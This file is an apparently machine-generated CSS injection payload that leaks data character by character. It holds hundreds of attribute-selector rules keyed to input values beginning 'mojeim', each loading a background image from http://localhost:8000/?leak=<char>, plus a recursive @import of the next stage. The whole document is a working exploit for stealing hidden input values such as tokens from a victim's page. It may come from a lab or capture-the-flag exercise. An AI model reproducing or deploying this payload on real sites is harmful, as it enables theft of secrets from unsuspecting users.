@import url("http://localhost:8000/?l=8");
input[value="mojeim!"] {background: url("http://localhost:8000/?leak=!&q=0.6022996228951036");}
input[value="mojeim\""] {background: url("http://localhost:8000/?leak=\"&q=0.3661814935559755");}
input[value="mojeim#"] {background: url("http://localhost:8000/?leak=#&q=0.5622557658239455");}
input[value="mojeim$"] {background: url("http://localhost:8000/?leak=$&q=0.38348068770884813");}
input[value="mojeim%"] {background: url("http://localhost:8000/?leak=%&q=0.4853407496705169");}
input[value="mojeim&"] {background: url("http://localhost:8000/?leak=&&q=0.7689435889753153");}
input[value="mojeim'"] {background: url("http://localhost:8000/?leak='&q=0.47614268414409966");}
input[value="mojeim("] {background: url("http://localhost:8000/?leak=(&q=0.6316313700246441");}
input[value="mojeim)"] {background: url("http://localhost:8000/?leak=)&q=0.722532562496716");}
input[value="mojeim*"] {background: url("http://localhost:8000/?leak=*&q=0.7441627858847768");}
input[value="mojeim+"] {background: url("http://localhost:8000/?leak=+&q=0.3256749728763786");}
input[value="mojeim,"] {background: url("http://localhost:8000/?leak=,&q=0.8085959811082202");}
input[value="mojeim-"] {background: url("http://localhost:8000/?leak=-&q=0.7209576068633452");}
input[value="mojeim."] {background: url("http://localhost:8000/?leak=.&q=0.8839233025922755");}
input[value="mojeim/"] {background: url("http://localhost:8000/?leak=/&q=0.5694722647980635");}
input[value="mojeim0"] {background: url("http://localhost:8000/?leak=0&q=0.280492859792806");}
input[value="mojeim1"] {background: url("http://localhost:8000/?leak=1&q=0.6716397910092275");}
input[value="mojeim2"] {background: url("http://localhost:8000/?leak=2&q=0.01988618014831456");}
input[value="mojeim3"] {background: url("http://localhost:8000/?leak=3&q=0.2675349828524374");}
input[value="mojeim4"] {background: url("http://localhost:8000/?leak=4&q=0.5108889649055111");}
input[value="mojeim5"] {background: url("http://localhost:8000/?leak=5&q=0.41754899633805587");}
input[value="mojeim6"] {background: url("http://localhost:8000/?leak=6&q=0.2711003250774531");}
input[value="mojeim7"] {background: url("http://localhost:8000/?leak=7&q=0.14121332385280816");}
input[value="mojeim8"] {background: url("http://localhost:8000/?leak=8&q=0.8987010700231364");}
input[value="mojeim9"] {background: url("http://localhost:8000/?leak=9&q=0.2652813795922344");}
input[value="mojeim:"] {background: url("http://localhost:8000/?leak=:&q=0.3230799513827869");}
input[value="mojeim;"] {background: url("http://localhost:8000/?leak=;&q=0.6247339905043001");}
input[value="mojeim<"] {background: url("http://localhost:8000/?leak=<&q=0.1711614561143382");}
input[value="mojeim="] {background: url("http://localhost:8000/?leak==&q=0.6852799778991248");}
input[value="mojeim>"] {background: url("http://localhost:8000/?leak=>&q=0.7675887022724845");}
input[value="mojeim?"] {background: url("http://localhost:8000/?leak=?&q=0.5147421428693879");}
input[value="mojeim@"] {background: url("http://localhost:8000/?leak=@&q=0.0868016092458046");}
input[value="mojeimA"] {background: url("http://localhost:8000/?leak=A&q=0.8206888128689462");}
input[value="mojeimB"] {background: url("http://localhost:8000/?leak=B&q=0.007707505367007261");}
input[value="mojeimC"] {background: url("http://localhost:8000/?leak=C&q=0.69987708012567");}
input[value="mojeimD"] {background: url("http://localhost:8000/?leak=D&q=0.7334239516100847");}
input[value="mojeimE"] {background: url("http://localhost:8000/?leak=E&q=0.4069122846565547");}
input[value="mojeimF"] {background: url("http://localhost:8000/?leak=F&q=0.3894667911730252");}
input[value="mojeimG"] {background: url("http://localhost:8000/?leak=G&q=0.1727271740928089");}
input[value="mojeimH"] {background: url("http://localhost:8000/?leak=H&q=0.1265147118404486");}
input[value="mojeimI"] {background: url("http://localhost:8000/?leak=I&q=0.48391967686589465");}
input[value="mojeimJ"] {background: url("http://localhost:8000/?leak=J&q=0.7662713056747847");}
input[value="mojeimK"] {background: url("http://localhost:8000/?leak=K&q=0.7762349258494949");}
input[value="mojeimL"] {background: url("http://localhost:8000/?leak=L&q=0.16181003069638855");}
input[value="mojeimM"] {background: url("http://localhost:8000/?leak=M&q=0.82906097850367");}
input[value="mojeimN"] {background: url("http://localhost:8000/?leak=N&q=0.4585588819489217");}
input[value="mojeimO"] {background: url("http://localhost:8000/?leak=O&q=0.4074270991043656");}
input[value="mojeimP"] {background: url("http://localhost:8000/?leak=P&q=0.9215434764312318");}
input[value="mojeimQ"] {background: url("http://localhost:8000/?leak=Q&q=0.17494381675696524");}
input[value="mojeimR"] {background: url("http://localhost:8000/?leak=R&q=0.5240713634384357");}
input[value="mojeimS"] {background: url("http://localhost:8000/?leak=S&q=0.6995027800139917");}
input[value="mojeimT"] {background: url("http://localhost:8000/?leak=T&q=0.09806921467255036");}
input[value="mojeimU"] {background: url("http://localhost:8000/?leak=U&q=0.8291655254563848");}
input[value="mojeimV"] {background: url("http://localhost:8000/?leak=V&q=0.0950895946466479");}
input[value="mojeimW"] {background: url("http://localhost:8000/?leak=W&q=0.010423988794766359");}
input[value="mojeimX"] {background: url("http://localhost:8000/?leak=X&q=0.1691943138305536");}
input[value="mojeimY"] {background: url("http://localhost:8000/?leak=Y&q=0.8886164682976472");}
input[value="mojeimZ"] {background: url("http://localhost:8000/?leak=Z&q=0.3187049210225177");}
input[value="mojeim["] {background: url("http://localhost:8000/?leak=[&q=0.18686577743310973");}
input[value="mojeim\\"] {background: url("http://localhost:8000/?leak=\\&q=0.10564271078440157");}
input[value="mojeim]"] {background: url("http://localhost:8000/?leak=]&q=0.3828390352023341");}
input[value="mojeim^"] {background: url("http://localhost:8000/?leak=^&q=0.8002488852053691");}
input[value="mojeim_"] {background: url("http://localhost:8000/?leak=_&q=0.4579602591341443");}
input[value="mojeim`"] {background: url("http://localhost:8000/?leak=`&q=0.08436103397563333");}
input[value="mojeima"] {background: url("http://localhost:8000/?leak=a&q=0.27456989218757566");}
input[value="mojeimb"] {background: url("http://localhost:8000/?leak=b&q=0.8167733385987372");}
input[value="mojeimc"] {background: url("http://localhost:8000/?leak=c&q=0.044647513869866096");}
input[value="mojeimd"] {background: url("http://localhost:8000/?leak=d&q=0.6846316436421558");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=e&q=0.3056142754894233");}
input[value="mojeimf"] {background: url("http://localhost:8000/?leak=f&q=0.1870445690801379");}
input[value="mojeimg"] {background: url("http://localhost:8000/?leak=g&q=0.6151141817137806");}
input[value="mojeimh"] {background: url("http://localhost:8000/?leak=h&q=0.18014546972359646");}
input[value="mojeimi"] {background: url("http://localhost:8000/?leak=i&q=0.800079730159251");}
input[value="mojeimj"] {background: url("http://localhost:8000/?leak=j&q=0.2822048463181006");}
input[value="mojeimk"] {background: url("http://localhost:8000/?leak=k&q=0.3500224503104421");}
input[value="mojeiml"] {background: url("http://localhost:8000/?leak=l&q=0.25245990474928126");}
input[value="mojeimm"] {background: url("http://localhost:8000/?leak=m&q=0.6576336319506133");}
input[value="mojeimn"] {background: url("http://localhost:8000/?leak=n&q=0.18425754093151436");}
input[value="mojeimo"] {background: url("http://localhost:8000/?leak=o&q=0.6977200769351766");}
input[value="mojeimp"] {background: url("http://localhost:8000/?leak=p&q=0.887529358717934");}
input[value="mojeimq"] {background: url("http://localhost:8000/?leak=q&q=0.577575371483183");}
input[value="mojeimr"] {background: url("http://localhost:8000/?leak=r&q=0.008238770797329487");}
input[value="mojeims"] {background: url("http://localhost:8000/?leak=s&q=0.7170819903100192");}
input[value="mojeimt"] {background: url("http://localhost:8000/?leak=t&q=0.8382014177964707");}
input[value="mojeimu"] {background: url("http://localhost:8000/?leak=u&q=0.10293543312647357");}
input[value="mojeimv"] {background: url("http://localhost:8000/?leak=v&q=0.4098987089349826");}
input[value="mojeimw"] {background: url("http://localhost:8000/?leak=w&q=0.6453450647188572");}
input[value="mojeimx"] {background: url("http://localhost:8000/?leak=x&q=0.8117445239117225");}
input[value="mojeimy"] {background: url("http://localhost:8000/?leak=y&q=0.569304060131272");}
input[value="mojeimz"] {background: url("http://localhost:8000/?leak=z&q=0.7129163902481441");}
input[value="mojeim{"] {background: url("http://localhost:8000/?leak={&q=0.840797147222569");}
input[value="mojeim|"] {background: url("http://localhost:8000/?leak=|&q=0.1575563005247944");}
input[value="mojeim}"] {background: url("http://localhost:8000/?leak=}&q=0.7655739012659726");}
input[value="mojeim~"] {background: url("http://localhost:8000/?leak=~&q=0.7452707152979572");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.1871778139110789");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.34874059111335654");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.3623232457430172");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.45449452793485956");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.11922848126024332");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.8496582283969352");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.47099336691666305");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.42750813695664425");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.7452633769185544");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.7426684604494722");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.9493246159959707");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.08525018149124519");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.9520436896265636");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.11198809715532798");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.8750921813873522");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.6548754137478241");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.8993683901585428");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.4060814760039124");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.373404963271188");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.519468124714171");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.7221949571161237");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.21480882036328874");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.3340106108848435");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.5668681225970262");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.8229900108307704");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.8124847495127834");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.08602972477538762");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.96908316717436");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.883864401767398");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.21736051619891805");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.6034601610937127");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.8585891591399544");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=&q=0.6416033374232821");}
input[value="mojeim "] {background: url("http://localhost:8000/?leak= &q=0.5659960245482187");}
input[value="mojeim¡"] {background: url("http://localhost:8000/?leak=¡&q=0.08269616101362165");}
input[value="mojeim¢"] {background: url("http://localhost:8000/?leak=¢&q=0.014963091895358716");}
input[value="mojeim£"] {background: url("http://localhost:8000/?leak=£&q=0.178755969527574");}
input[value="mojeim¤"] {background: url("http://localhost:8000/?leak=¤&q=0.35366882758159224");}
input[value="mojeim¥"] {background: url("http://localhost:8000/?leak=¥&q=0.219982617769374");}
input[value="mojeim¦"] {background: url("http://localhost:8000/?leak=¦&q=0.9228556089207607");}
input[value="mojeim§"] {background: url("http://localhost:8000/?leak=§&q=0.48738286720137647");}
input[value="mojeim¨"] {background: url("http://localhost:8000/?leak=¨&q=0.2757087076859328");}
input[value="mojeim©"] {background: url("http://localhost:8000/?leak=©&q=0.7315018688578967");}
input[value="mojeimª"] {background: url("http://localhost:8000/?leak=ª&q=0.9750703450866798");}
input[value="mojeim«"] {background: url("http://localhost:8000/?leak=«&q=0.502868263183694");}
input[value="mojeim¬"] {background: url("http://localhost:8000/?leak=¬&q=0.9518097160099119");}
input[value="mojeim­"] {background: url("http://localhost:8000/?leak=­&q=0.5556411943701618");}
input[value="mojeim®"] {background: url("http://localhost:8000/?leak=®&q=0.15047985739200742");}
input[value="mojeim¯"] {background: url("http://localhost:8000/?leak=¯&q=0.19420071390385885");}
input[value="mojeim°"] {background: url("http://localhost:8000/?leak=°&q=0.17712538001814115");}
input[value="mojeim±"] {background: url("http://localhost:8000/?leak=±&q=0.08340076127787133");}
input[value="mojeim²"] {background: url("http://localhost:8000/?leak=²&q=0.48918278417569194");}
input[value="mojeim³"] {background: url("http://localhost:8000/?leak=³&q=0.7396101564016675");}
input[value="mojeim´"] {background: url("http://localhost:8000/?leak=´&q=0.7734794010102679");}
input[value="mojeimµ"] {background: url("http://localhost:8000/?leak=µ&q=0.8096183148783807");}
input[value="mojeim¶"] {background: url("http://localhost:8000/?leak=¶&q=0.7391312912526726");}
input[value="mojeim·"] {background: url("http://localhost:8000/?leak=·&q=0.19272199261834766");}
input[value="mojeim¸"] {background: url("http://localhost:8000/?leak=¸&q=0.6629481644889952");}
input[value="mojeim¹"] {background: url("http://localhost:8000/?leak=¹&q=0.584192617518668");}
input[value="mojeimº"] {background: url("http://localhost:8000/?leak=º&q=0.8099618984371728");}
input[value="mojeim»"] {background: url("http://localhost:8000/?leak=»&q=0.5176254571292791");}
input[value="mojeim¼"] {background: url("http://localhost:8000/?leak=¼&q=0.5035234895941552");}
input[value="mojeim½"] {background: url("http://localhost:8000/?leak=½&q=0.6064653826680553");}
input[value="mojeim¾"] {background: url("http://localhost:8000/?leak=¾&q=0.022994525152328693");}
input[value="mojeim¿"] {background: url("http://localhost:8000/?leak=¿&q=0.7348734545646747");}
input[value="mojeimÀ"] {background: url("http://localhost:8000/?leak=À&q=0.9069732803906021");}
input[value="mojeimÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.06787825112275359");}
input[value="mojeimÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.8419805412068804");}
input[value="mojeimÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.6831813952465806");}
input[value="mojeimÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.18711029158410053");}
input[value="mojeimÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.5878348509894806");}
input[value="mojeimÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.9781306347125669");}
input[value="mojeimÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.1258081552088317");}
input[value="mojeimÈ"] {background: url("http://localhost:8000/?leak=È&q=0.19277801571736175");}
input[value="mojeimÉ"] {background: url("http://localhost:8000/?leak=É&q=0.0984735472579199");}
input[value="mojeimÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.6347664864666476");}
input[value="mojeimË"] {background: url("http://localhost:8000/?leak=Ë&q=0.5580388250932509");}
input[value="mojeimÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.39377348501600573");}
input[value="mojeimÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.25235304680561477");}
input[value="mojeimÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.17448379892349153");}
input[value="mojeimÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.7597863501541204");}
input[value="mojeimÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.2660952002411745");}
input[value="mojeimÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.19822804014592355");}
input[value="mojeimÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.6186255449173403");}
input[value="mojeimÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.6250603237330719");}
input[value="mojeimÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.18993569069695537");}
input[value="mojeimÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.7169719618229327");}
input[value="mojeimÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.3553868168146612");}
input[value="mojeim×"] {background: url("http://localhost:8000/?leak=×&q=0.4507251002404742");}
input[value="mojeimØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.9865338765279887");}
input[value="mojeimÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.3037812991977573");}
input[value="mojeimÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.16950258746565838");}
input[value="mojeimÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.6322740801702371");}
input[value="mojeimÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.8808297044897659");}
input[value="mojeimÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.26726997046520395");}
input[value="mojeimÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.8713975523005801");}
input[value="mojeimß"] {background: url("http://localhost:8000/?leak=ß&q=0.04984206376421807");}
input[value="mojeimà"] {background: url("http://localhost:8000/?leak=à&q=0.9170629094126834");}
input[value="mojeimá"] {background: url("http://localhost:8000/?leak=á&q=0.20538707444440285");}
input[value="mojeimâ"] {background: url("http://localhost:8000/?leak=â&q=0.769771279469929");}
input[value="mojeimã"] {background: url("http://localhost:8000/?leak=ã&q=0.2363313064800443");}
input[value="mojeimä"] {background: url("http://localhost:8000/?leak=ä&q=0.3012942847698552");}
input[value="mojeimå"] {background: url("http://localhost:8000/?leak=å&q=0.8086673905039607");}
input[value="mojeimæ"] {background: url("http://localhost:8000/?leak=æ&q=0.7709722777453998");}
input[value="mojeimç"] {background: url("http://localhost:8000/?leak=ç&q=0.09769431207372592");}
input[value="mojeimè"] {background: url("http://localhost:8000/?leak=è&q=0.6726664800556024");}
input[value="mojeimé"] {background: url("http://localhost:8000/?leak=é&q=0.739910060347025");}
input[value="mojeimê"] {background: url("http://localhost:8000/?leak=ê&q=0.7713398676823249");}
input[value="mojeimë"] {background: url("http://localhost:8000/?leak=ë&q=0.38506449405735665");}
input[value="mojeimì"] {background: url("http://localhost:8000/?leak=ì&q=0.6941728768220148");}
input[value="mojeimí"] {background: url("http://localhost:8000/?leak=í&q=0.6411489433658748");}
input[value="mojeimî"] {background: url("http://localhost:8000/?leak=î&q=0.9192019664878501");}
input[value="mojeimï"] {background: url("http://localhost:8000/?leak=ï&q=0.21667587003321853");}
input[value="mojeimð"] {background: url("http://localhost:8000/?leak=ð&q=0.05322724938234624");}
input[value="mojeimñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.27908520988119156");}
input[value="mojeimò"] {background: url("http://localhost:8000/?leak=ò&q=0.04881308280450636");}
input[value="mojeimó"] {background: url("http://localhost:8000/?leak=ó&q=0.982075898173955");}
input[value="mojeimô"] {background: url("http://localhost:8000/?leak=ô&q=0.5608054869322578");}
input[value="mojeimõ"] {background: url("http://localhost:8000/?leak=õ&q=0.5222382495290714");}
input[value="mojeimö"] {background: url("http://localhost:8000/?leak=ö&q=0.9250651591758043");}
input[value="mojeim÷"] {background: url("http://localhost:8000/?leak=÷&q=0.8361402404297562");}
input[value="mojeimø"] {background: url("http://localhost:8000/?leak=ø&q=0.013301517986947564");}
input[value="mojeimù"] {background: url("http://localhost:8000/?leak=ù&q=0.4070046821318498");}
input[value="mojeimú"] {background: url("http://localhost:8000/?leak=ú&q=0.2866244746823752");}
input[value="mojeimû"] {background: url("http://localhost:8000/?leak=û&q=0.9367439067448844");}
input[value="mojeimü"] {background: url("http://localhost:8000/?leak=ü&q=0.2604842611461269");}
input[value="mojeimý"] {background: url("http://localhost:8000/?leak=ý&q=0.09730282278252167");}
input[value="mojeimþ"] {background: url("http://localhost:8000/?leak=þ&q=0.2919821115083545");}
input[value="mojeimÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.9648532919748232");}
